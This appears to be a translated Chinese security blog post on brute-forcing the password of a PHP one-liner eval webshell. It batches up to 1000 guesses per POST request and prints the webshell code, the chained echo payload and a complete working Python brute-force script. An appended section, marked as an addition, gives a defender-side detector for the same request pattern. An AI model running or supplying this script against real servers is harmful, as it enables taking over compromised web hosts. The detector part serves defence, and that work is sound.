Python: brute-forcing a one-liner webshell a thousand times faster

Time: 2022-06-06 05:21:22

I was quite inspired after reading the article by 冰河: https://bbs.ichunqiu.com/thread-16952-1-1.html

A brief description:

The traditional approach submits a single value per request.

Take the following one-liner webshell:

<?php @eval($_POST['test']);?>

If the request is http://172.16.0.5/index.php?shell?test=echo "password is test";

then the submitted data is: test=echo "password is test";

If the password is correct, the echo runs and outputs password is test.

Then "&" is used to chain guesses together for brute-forcing. Apache indeed caps the number of parameters at 1000; IIS at 5883.

That is:

i3ekr=echo "password is i3ekr";&123=echo "password is 123";&admin=echo "password is admin";&1=echo "password is 1";&pass=echo "password is pass";&test=echo "password is test";

From this, a brute-force script can be written.

Script:

# -*- coding: UTF-8 -*-
# coding by v5est0r
# Submit many variables in one request: brute-force the one-liner ~1000x faster
import math
import requests

shell = 'http://192.168.1.103/hack.php'
# ASP equivalent of the probe: v5est0r=response.write("password:v5est0r")
post_data = {}  # parameter dictionary for one batch

with open('pass.txt', 'r') as s:
    content = s.readlines()  # read the wordlist line by line

group = [line.strip('\n') for line in content]  # strip the newline from every candidate
dics = math.ceil(len(group) / 1000)  # groups of 1000 (the per-request parameter cap)
print('Number of candidates in the current wordlist: %s' % len(group))
print('The wordlist will be split into %s parts' % dics)

# Establish the response signature for a wrong password
post_test = {'test_pass_test': 'echo "test!!";'}
res = requests.post(shell, data=post_test)
wrong_res = res.text

for i in range(dics):
    new_group = group[i * 1000:(i + 1) * 1000]  # slicing never runs past the end
    for each in new_group:
        post_data[each] = 'echo "password is %s";' % each
    r = requests.post(shell, data=post_data)
    print('Running wordlist batch %s' % (i + 1))
    post_data.clear()
    print(r.text)
    if len(r.text) != len(wrong_res):
        break
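A defender-side check for the batched request pattern described above, added here as an example and not part of the original post or its script. It parses a URL-encoded POST body, counts distinct parameter names and flags names that echo themselves back inside a code-like value; the thresholds, the function names and the sample bodies are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Thresholds and sample bodies below are constructed for this example.
MAX_DISTINCT_PARAMS = 50
# A form field value carrying a PHP statement such as echo/eval/system is
# not something an ordinary form submits.
CODE_MARKER = re.compile(r'\b(echo|eval|system|exec|passthru|assert)\b')


def split_body(body: str) -> dict:
    """Split a URL-encoded body into {name: [values]} on '&' only.

    Done by hand so the ';' that terminates a PHP statement inside a value
    is never treated as a pair separator (older parse_qs versions did that).
    """
    fields = {}
    for pair in body.split('&'):
        if not pair:
            continue
        name, _, value = pair.partition('=')
        fields.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return fields


def analyse_post_body(body: str, max_params: int = MAX_DISTINCT_PARAMS) -> dict:
    """Flag a POST body that looks like a batched one-liner password guess.

    The pattern is many distinct parameter names, each carrying
    'echo "password is <name>";' so the real key echoes itself back. Two
    signals capture it: an abnormal number of distinct names, and names
    that appear inside their own code-like value.
    """
    fields = split_body(body)
    code_values = [n for n, vs in fields.items() if any(CODE_MARKER.search(v) for v in vs)]
    self_ref = [n for n in code_values if any(n in v for v in fields[n])]
    return {
        'distinct_params': len(fields),
        'code_values': len(code_values),
        'self_referencing': len(self_ref),
        'suspicious': len(fields) > max_params or len(self_ref) >= 2,
    }


# Constructed samples: an ordinary login form, the six-guess batch from the
# post, and a 1000-name batch that trips the count threshold.
SAMPLE_LOGIN = 'username=alice&password=S3cret%21&remember=1'
SAMPLE_BATCH = '&'.join('%s=echo "password is %s";' % (p, p)
                        for p in ['i3ekr', '123', 'admin', '1', 'pass', 'test'])
SAMPLE_BIG = '&'.join('w%d=echo "password is w%d";' % (i, i) for i in range(1000))
```

On the PHP side, the 1000-parameter ceiling the post runs into is the kind of limit set by max_input_vars, so keeping that directive at or below its default bounds how many guesses a single request can carry.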